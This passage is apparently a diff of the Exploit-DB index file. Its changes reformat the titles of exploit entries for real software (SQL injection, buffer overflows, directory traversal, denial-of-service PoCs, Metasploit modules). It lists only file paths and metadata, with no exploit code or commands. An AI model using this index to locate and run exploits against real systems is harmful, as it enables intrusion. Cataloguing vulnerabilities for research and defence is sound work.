- Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 -16240,platforms/hardware/remote/16240.txt,"iPhone PDF Reader Pro 2.3 Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 +16240,platforms/hardware/remote/16240.txt,"iphone pdf reader pro 2.3 - Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 16241,platforms/asp/webapps/16241.txt,"RaksoCT Multiple SQL Injection Vulnerabilities",2011-02-25,p0pc0rn,asp,webapps,0 16242,platforms/windows/remote/16242.html,"Edraw Office Viewer Component 7.4 - ActiveX Stack Buffer Overflow",2011-02-25,"Alexander Gavrun",windows,remote,0 -16243,platforms/hardware/remote/16243.py,"iPhone Folders 2.5 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 -16244,platforms/hardware/remote/16244.py,"iPhone iFile 2.0 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 -16245,platforms/hardware/remote/16245.py,"iPhone MyDocs 2.7 Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 +16243,platforms/hardware/remote/16243.py,"iphone folders 2.5 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 +16244,platforms/hardware/remote/16244.py,"iphone ifile 2.0 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 +16245,platforms/hardware/remote/16245.py,"iphone mydocs 2.7 - Directory Traversal",2011-02-25,IRCRASH,hardware,remote,0 16246,platforms/php/webapps/16246.py,"Joomla XCloner Component (com_xcloner-backupandrestore) Remote Command Execution",2011-02-25,mr_me,php,webapps,0 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 -16249,platforms/php/webapps/16249.txt,"PhreeBooks R30RC4 Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 +16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin LFI Vulnerability",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,IRCRASH,hardware,webapps,0 @@ -14044,7 +14042,7 @@ id,file,description,date,author,platform,type,port 16255,platforms/windows/dos/16255.pl,"Magic Music Editor .cda Denial of Service",2011-02-28,AtT4CKxT3rR0r1ST,windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS Multiple SQL Injection Vulnerabilities",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof (page.php) SQL Injection Vulnerability",2011-02-28,AtT4CKxT3rR0r1ST,php,webapps,0 -16259,platforms/windows/remote/16259.txt,"Home FTP SERVER 1.12 Directory Traversal",2011-02-28,clshack,windows,remote,0 +16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 Denial of Service",2011-02-28,clshack,windows,dos,0 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"MS11-011(CVE-2011-0045): MS Windows XP WmiTraceMessageVa Integer Truncation Vulnerability PoC",2011-03-01,"Nikita Tarakanov",windows,dos,0 @@ -14052,7 +14050,7 @@ id,file,description,date,author,platform,type,port 16264,platforms/windows/local/16264.pl,"Magic Music Editor Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection Vulnerability",2011-03-02,eXeSoul,php,webapps,0 -16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.1 Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 +16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/hardware/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",hardware,remote,0 @@ -14128,7 +14126,7 @@ id,file,description,date,author,platform,type,port 16343,platforms/windows/remote/16343.rb,"Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16344,platforms/windows/remote/16344.rb,"FutureSoft TFTP Server 2000 Transfer-Mode Overflow",2010-05-09,metasploit,windows,remote,0 16345,platforms/windows/remote/16345.rb,"D-Link TFTP 1.0 Long Filename Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16346,platforms/windows/remote/16346.rb,"TFTPDWIN v0.4.2 Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0 +16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0 16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14241,11 +14239,11 @@ id,file,description,date,author,platform,type,port 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16457,platforms/windows/remote/16457.rb,"LANDesk Management Suite 8.7 Alert Service Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16458,platforms/windows/remote/16458.rb,"POP Peeper 3.4 - UIDL Buffer Overflow",2010-11-30,metasploit,windows,remote,0 -16459,platforms/windows/remote/16459.rb,"Talkative IRC v0.4.4.16 Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 +16459,platforms/windows/remote/16459.rb,"Talkative IRC 0.4.4.16 - Response Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16460,platforms/windows/remote/16460.rb,"SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16461,platforms/windows/remote/16461.rb,"FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16462,platforms/windows/remote/16462.rb,"FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= v0.53 Buffer Overflow",2010-06-15,metasploit,windows,remote,0 +16463,platforms/windows/remote/16463.rb,"PuTTy.exe <= 0.53 - Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16464,platforms/windows/remote/16464.rb,"ISS PAM.dll ICQ Parser Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16465,platforms/windows/remote/16465.rb,"Kerio Firewall 2.1.4 Authentication Packet Overflow",2010-06-15,metasploit,windows,remote,0 16466,platforms/win32/remote/16466.rb,"Arkeia Backup Client Type 77 Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 @@ -14476,7 +14474,7 @@ id,file,description,date,author,platform,type,port 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,metasploit,windows,remote,3128 16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 ""secure"" Overflow (Win32)",2010-09-20,metasploit,windows,remote,7787 -16694,platforms/windows/remote/16694.rb,"Racer v0.5.3 beta 5 Buffer Overflow",2010-09-20,metasploit,windows,remote,26000 +16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow",2010-11-11,metasploit,windows,remote,80 @@ -14572,7 +14570,7 @@ id,file,description,date,author,platform,type,port 16787,platforms/windows/remote/16787.rb,"Ipswitch WhatsUp Gold 8.03 Buffer Overflow",2010-07-14,metasploit,windows,remote,0 16788,platforms/cfm/webapps/16788.rb,"ColdFusion 8.0.1 Arbitrary File Upload and Execute",2010-11-24,metasploit,cfm,webapps,0 16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 Arbitrary File Upload and Execute",2010-11-24,metasploit,multiple,remote,8080 -16790,platforms/windows/dos/16790.rb,"PSO Proxy v0.91 Stack Buffer Overflow",2010-05-09,metasploit,windows,dos,8080 +16790,platforms/windows/dos/16790.rb,"PSO Proxy 0.91 - Stack Buffer Overflow",2010-05-09,metasploit,windows,dos,8080 16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM GET Buffer Overflow",2010-05-09,metasploit,windows,remote,9999 16792,platforms/windows/remote/16792.rb,"HP OpenView Network Node Manager OvWebHelp.exe CGI Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16793,platforms/windows/remote/16793.rb,"Amlibweb NetOpacs webquery.dll Stack Buffer Overflow",2010-11-14,metasploit,windows,remote,80 @@ -14662,7 +14660,7 @@ id,file,description,date,author,platform,type,port 16877,platforms/irix/remote/16877.rb,"Irix LPD tagprinter Command Execution",2010-10-06,metasploit,irix,remote,0 16878,platforms/linux/remote/16878.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)",2010-12-02,metasploit,linux,remote,0 16879,platforms/freebsd/remote/16879.rb,"XTACACSD <= 4.1.2 report() Buffer Overflow",2010-05-09,metasploit,freebsd,remote,0 -16880,platforms/linux/remote/16880.rb,"Samba trans2open Overflow (*BSD x86)",2010-06-17,metasploit,linux,remote,0 +16880,platforms/linux/remote/16880.rb,"Samba trans2open - Overflow (*BSD x86)",2010-06-17,metasploit,linux,remote,0 16881,platforms/php/webapps/16881.rb,"Cacti graph_view.php Remote Command Execution",2010-07-03,metasploit,php,webapps,0 16882,platforms/php/webapps/16882.rb,"PHP XML-RPC Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 16883,platforms/php/webapps/16883.rb,"Simple PHP Blog <= 0.4.0 Remote Command Execution",2010-07-25,metasploit,php,webapps,0 @@ -14713,7 +14711,7 @@ id,file,description,date,author,platform,type,port 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 CSRF Vulnerability (Add Admin)",2011-03-06,AtT4CKxT3rR0r1ST,php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0 16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability",2011-03-06,DSecurity,php,webapps,0 -16935,platforms/php/webapps/16935.txt,"Bacula-web 1.3.x - 5.0.3 Multiple Remote Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 +16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x - 5.0.3 Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 16936,platforms/windows/remote/16936.html,"KingView 6.5.3 SCADA ActiveX Exploit",2011-03-07,"Carlos Mario Penagos Hollmann",windows,remote,0 16937,platforms/php/webapps/16937.pl,"EggAvatar 2.3.2 for vBulletin 3.8.x Local File Read",2011-03-07,DSecurity,php,webapps,0 16938,platforms/php/webapps/16938.txt,"BMForum Myna 6.0 SQL Injection Vulnerability",2011-03-07,"Stephan Sattler",php,webapps,0 @@ -14728,24 +14726,24 @@ id,file,description,date,author,platform,type,port 16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 -16950,platforms/php/webapps/16950.txt,"RecordPress 0.3.1 Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0 +16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0 16951,platforms/bsd/local/16951.c,"FreeBSD <= 6.4 Netgraph Local Privledge Escalation Exploit",2011-03-10,zx2c4,bsd,local,0 16952,platforms/linux/dos/16952.c,"Linux Kernel < 2.6.37-rc2 TCP_MAXSEG Kernel Panic DoS",2011-03-10,zx2c4,linux,dos,0 16953,platforms/asp/webapps/16953.txt,"Luch Web Designer Multiple SQL Injection Vulnerabilities",2011-03-10,p0pc0rn,asp,webapps,0 16954,platforms/php/webapps/16954.txt,"Keynect Ecommerce SQL Injection Vulnerability",2011-03-10,"Arturo Zamora",php,webapps,0 -16955,platforms/asp/webapps/16955.txt,"SmarterMail 7.3 and 7.4 Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 +16955,platforms/asp/webapps/16955.txt,"smartermail 7.3 and 7.4 - Multiple Vulnerabilities",2011-03-10,"Hoyt LLC Research",asp,webapps,0 16956,platforms/windows/remote/16956.rb,"Novell iPrint Client ActiveX Control <= 5.52 Buffer Overflow",2011-03-07,metasploit,windows,remote,0 16957,platforms/windows/remote/16957.rb,"Oracle MySQL for Microsoft Windows Payload Execution",2011-03-08,metasploit,windows,remote,0 16959,platforms/multiple/webapps/16959.txt,"Oracle WebLogic Session Fixation Via HTTP POST",2011-03-11,"Roberto Suggi Liverani",multiple,webapps,0 16960,platforms/linux/dos/16960.txt,"Linux NTP query client 4.2.6p1 - Heap Overflow Vulnerability",2011-03-11,mr_me,linux,dos,0 16961,platforms/php/webapps/16961.py,"N`CMS 1.1E Pre-Auth Local File Inclusion Remote Code Exploit",2011-03-11,TecR0c,php,webapps,0 -16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 +16962,platforms/asp/webapps/16962.txt,"SmarterStats 6.0 - Multiple Vulnerabilities",2011-03-11,"Hoyt LLC Research",asp,webapps,0 16963,platforms/php/webapps/16963.txt,"Constructr CMS 3.03 Miltiple Remote Vulnerabilities",2011-03-11,LiquidWorm,php,webapps,0 16964,platforms/unix/remote/16964.rb,"Accellion File Transfer Appliance MPIPE2 Command Execution",2011-03-11,metasploit,unix,remote,8812 16965,platforms/windows/local/16965.pl,"CoolZip 2.0 zip Buffer Overflow Exploit",2011-03-12,"C4SS!0 G0M3S",windows,local,0 16966,platforms/linux/dos/16966.php,"PHP <= 5.3.6 shmop_read() Integer Overflow DoS",2011-03-12,"Jose Carlos Norte",linux,dos,0 16968,platforms/php/webapps/16968.txt,"Cover Vision SQL Injection Vulnerability",2011-03-13,Egyptian.H4x0rz,php,webapps,0 -16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 +16969,platforms/php/webapps/16969.txt,"Log1 CMS 2.0 - Multiple Vulnerabilities",2011-03-14,Aodrulez,php,webapps,0 16970,platforms/windows/remote/16970.rb,"Kolibri <= 2.0 - HTTP Server HEAD Buffer Overflow",2011-08-03,metasploit,windows,remote,0 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 16972,platforms/hardware/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,hardware,remote,0 @@ -14757,11 +14755,11 @@ id,file,description,date,author,platform,type,port 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 Javascript File Write",2011-03-14,metasploit,windows,local,0 16979,platforms/windows/dos/16979.html,"Opera 11.01 NULL PTR Derefernce",2011-03-15,echo,windows,dos,0 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-03-15,TecR0c,php,webapps,0 -16982,platforms/php/webapps/16982.txt,"LotusCMS 3.0.3 Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 +16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server Backdoor Account Code Execution",2011-03-15,metasploit,windows,remote,0 16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,metasploit,multiple,remote,0 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha Denial of Service",2011-03-16,BraniX,windows,dos,0 -16987,platforms/php/webapps/16987.txt,"Pointter PHP Content Management System 1.2 Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 +16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 16989,platforms/php/webapps/16989.txt,"b2evolution 4.0.3 Persistent XSS Vulnerability",2011-03-16,"AutoSec Tools",php,webapps,0 16990,platforms/multiple/remote/16990.rb,"Sun Java Applet2ClassLoader Remote Code Execution Exploit",2011-03-16,metasploit,multiple,remote,0 @@ -14769,7 +14767,7 @@ id,file,description,date,author,platform,type,port 16992,platforms/php/webapps/16992.txt,"Joomla! 1.6 Multiple SQL Injection Vulnerabilities",2011-03-17,"Aung Khant",php,webapps,0 16993,platforms/hardware/remote/16993.pl,"ACTi ASOC 2200 Web Configurator <= 2.6 - Remote Root Command Execution",2011-03-17,"Todor Donev",hardware,remote,0 16995,platforms/php/webapps/16995.txt,"Joomla com_booklibrary - SQL Injection",2011-03-17,"Marc Doudiet",php,webapps,0 -16996,platforms/windows/dos/16996.rb,"Fake Webcam v 6.1 Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 +16996,platforms/windows/dos/16996.rb,"Fake Webcam 6.1 - Local Crash PoC",2011-03-17,"Anastasios Monachos",windows,dos,0 16997,platforms/php/webapps/16997.txt,"Tugux CMS 1.0_final Multiple Vulnerabilities",2011-03-17,Aodrulez,php,webapps,0 16998,platforms/windows/remote/16998.rb,"RealNetworks RealPlayer CDDA URI Initialization Vulnerability",2011-03-17,metasploit,windows,remote,0 16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 SEH Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 @@ -14779,7 +14777,7 @@ id,file,description,date,author,platform,type,port 17003,platforms/php/webapps/17003.py,"iCMS 1.1 - Admin SQLi/Bruteforce Exploit",2011-03-18,TecR0c,php,webapps,0 17004,platforms/linux/dos/17004.txt,"libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)",2011-03-18,"Maksymilian Arciemowicz",linux,dos,0 17005,platforms/php/webapps/17005.txt,"Kleophatra 0.1.4 0day Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 -17006,platforms/php/webapps/17006.txt,"Balitbang CMS 3.3 Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 +17006,platforms/php/webapps/17006.txt,"balitbang cms 3.3 - Multiple Vulnerabilities",2011-03-19,Xr0b0t,php,webapps,0 17007,platforms/php/webapps/17007.txt,"Phpbuddies Arbitrary Upload File Vulnerability",2011-03-19,Xr0b0t,php,webapps,0 17009,platforms/php/webapps/17009.txt,"CMS Balitbang 3.3 Arbitary File Upload Vulnerability",2011-03-19,eidelweiss,php,webapps,0 17011,platforms/asp/webapps/17011.txt,"Douran 3.9.7.8 File Download/Source Code Disclosure Vulnerability",2011-03-20,"AJAX Security Team",asp,webapps,0 @@ -14787,14 +14785,14 @@ id,file,description,date,author,platform,type,port 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 m3u SEH Overflow Exploit",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 17014,platforms/php/webapps/17014.txt,"CMS Lokomedia 1.5 Arbitary File Upload Vulnerability",2011-03-21,eidelweiss,php,webapps,0 17015,platforms/asp/webapps/17015.txt,"Element-IT PowUpload 1.3 File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 -17016,platforms/asp/webapps/17016.txt,"EAFlashUpload v 2.5 File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 +17016,platforms/asp/webapps/17016.txt,"EAFlashUpload 2.5 - File Arbitrary Upload",2011-03-21,"Daniel Godoy",asp,webapps,0 17018,platforms/php/webapps/17018.txt,"Shimbi CMS Multiple SQL Injection Vulnerabilities",2011-03-21,p0pc0rn,php,webapps,0 17019,platforms/windows/dos/17019.txt,"RealPlayer <= 14.0.1.633 Heap Overflow Vulnerability",2011-03-21,"Luigi Auriemma",windows,dos,0 17020,platforms/netware/dos/17020.py,"Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability",2011-03-21,"Francis Provencher",netware,dos,0 17021,platforms/windows/dos/17021.py,"SpoonFTP 1.2 RETR Denial of Service Vulnerability",2011-03-21,"C4SS!0 G0M3S",windows,dos,0 -17022,platforms/windows/remote/17022.txt,"Siemens Tecnomatix FactoryLink 8.0.1.1473 Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 -17023,platforms/windows/dos/17023.txt,"Iconics GENESIS32 and GENESIS64 Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 -17024,platforms/windows/remote/17024.txt,"7-Technologies IGSS 9.00.00.11059 Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 +17022,platforms/windows/remote/17022.txt,"siemens tecnomatix factorylink 8.0.1.1473 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 +17023,platforms/windows/dos/17023.txt,"iconics genesis32 and genesis64 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 +17024,platforms/windows/remote/17024.txt,"7-technologies igss 9.00.00.11059 - Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,remote,0 17025,platforms/windows/dos/17025.txt,"DATAC RealWin Multiple Vulnerabilities",2011-03-22,"Luigi Auriemma",windows,dos,0 17026,platforms/windows/webapps/17026.txt,"Symantec LiveUpdate Administrator Management GUI HTML Injection",2011-03-23,"Nikolas Sotiriu",windows,webapps,0 17027,platforms/windows/remote/17027.rb,"Adobe Flash Player AVM Bytecode Verification",2011-03-23,metasploit,windows,remote,0 @@ -14816,30 +14814,30 @@ id,file,description,date,author,platform,type,port 17043,platforms/windows/remote/17043.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17044,platforms/windows/remote/17044.rb,"HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow",2011-03-23,metasploit,windows,remote,0 17045,platforms/windows/dos/17045.py,"Avaya IP Office Manager 8.1 TFTP DOS",2011-03-24,"Craig Freyman",windows,dos,69 -17046,platforms/php/webapps/17046.txt,"SyndeoCMS 2.8.02 Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0 +17046,platforms/php/webapps/17046.txt,"syndeocms 2.8.02 - Multiple Vulnerabilities",2011-03-24,"High-Tech Bridge SA",php,webapps,0 17047,platforms/windows/remote/17047.rb,"HP OpenView Network Node Manager getnnmdata.exe (Hostname) CGI Buffer Overflow",2011-03-25,metasploit,windows,remote,0 17048,platforms/windows/remote/17048.rb,"VLC AMV Dangling Pointer Vulnerability",2011-03-26,metasploit,windows,remote,0 17050,platforms/php/webapps/17050.txt,"Family Connections CMS 2.3.2 (POST) Stored XSS And XML Injection",2011-03-26,LiquidWorm,php,webapps,0 -17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 +17051,platforms/php/webapps/17051.txt,"SimplisCMS 1.0.3.0 - Multiple Vulnerabilities",2011-03-27,NassRawI,php,webapps,0 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 -17054,platforms/php/webapps/17054.txt,"webEdition CMS 6.1.0.2 Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 +17054,platforms/php/webapps/17054.txt,"webedition cms 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec Tools",php,webapps,0 17055,platforms/php/webapps/17055.txt,"Honey Soft Web Solution Multiple Vulnerabilities",2011-03-28,**RoAd_KiLlEr**,php,webapps,0 17056,platforms/php/webapps/17056.txt,"Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability",2011-03-28,"Sense of Security",php,webapps,0 17057,platforms/php/webapps/17057.txt,"webEdition CMS Local File Inclusion Vulnerability",2011-03-28,eidelweiss,php,webapps,0 17058,platforms/linux/remote/17058.rb,"Distributed Ruby Send instance_eval/syscall Code Execution",2011-03-27,metasploit,linux,remote,0 17061,platforms/php/webapps/17061.txt,"Andy's PHP Knowledgebase Project 0.95.4 SQL Injection",2011-03-29,"AutoSec Tools",php,webapps,0 17062,platforms/php/webapps/17062.txt,"Claroline 1.10 Persistent XSS Vulnerability",2011-03-29,"AutoSec Tools",php,webapps,0 -17063,platforms/windows/remote/17063.txt,"Easy File Sharing Web Server 5.8 Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 +17063,platforms/windows/remote/17063.txt,"easy file sharing web server 5.8 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",windows,remote,0 17064,platforms/windows/local/17064.py,"IDEAL Administration 2011 11.4 - Local SEH Buffer Overflow Exploit",2011-03-29,Dr_IDE,windows,local,0 17068,platforms/multiple/remote/17068.py,"jHTTPd 0.1a Directory Traversal Vulnerability",2011-03-29,"AutoSec Tools",multiple,remote,0 -17069,platforms/php/webapps/17069.txt,"osCSS2 2.1.0 RC12 Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 +17069,platforms/php/webapps/17069.txt,"oscss2 2.1.0 rc12 - Multiple Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 17070,platforms/windows/dos/17070.py,"Rumble 0.25.2232 Denial of Service Vulnerability",2011-03-29,"AutoSec Tools",windows,dos,0 17071,platforms/windows/dos/17071.py,"GOM Player 2.1.28.5039 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 17072,platforms/windows/dos/17072.py,"Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC",2011-03-29,BraniX,windows,dos,0 17074,platforms/windows/dos/17074.py,"Winamp 5.61 - AVI DoS PoC",2011-03-29,BraniX,windows,dos,0 17075,platforms/windows/dos/17075.py,"Media Player Classic Home Cinema 1.5.0.2827 AVI DoS PoC",2011-03-30,BraniX,windows,dos,0 17076,platforms/php/webapps/17076.txt,"YaCOMAS 0.3.6 Alpha Multiple Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps,0 -17077,platforms/php/webapps/17077.txt,"Pligg CMS 1.1.3 Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 +17077,platforms/php/webapps/17077.txt,"pligg cms 1.1.3 - Multiple Vulnerabilities",2011-03-30,"Jelmer de Hen",php,webapps,0 17078,platforms/multiple/remote/17078.java,"Zend Java Bridge - Remote Code Execution (ZDI-11-113)",2011-03-30,ikki,multiple,remote,0 17079,platforms/php/webapps/17079.txt,"IrIran Shoping Script SQL Injection Vulnerability",2011-03-30,Net.Edit0r,php,webapps,0 17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 Remote File Upload Vulnerability",2011-03-30,Net.Edit0r,php,webapps,0 @@ -14848,8 +14846,8 @@ id,file,description,date,author,platform,type,port 17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 Remote Download Backup Vulnerability",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 -17087,platforms/windows/dos/17087.pl,"Real player 14.0.2.633 0day Buffer overflow/DOS 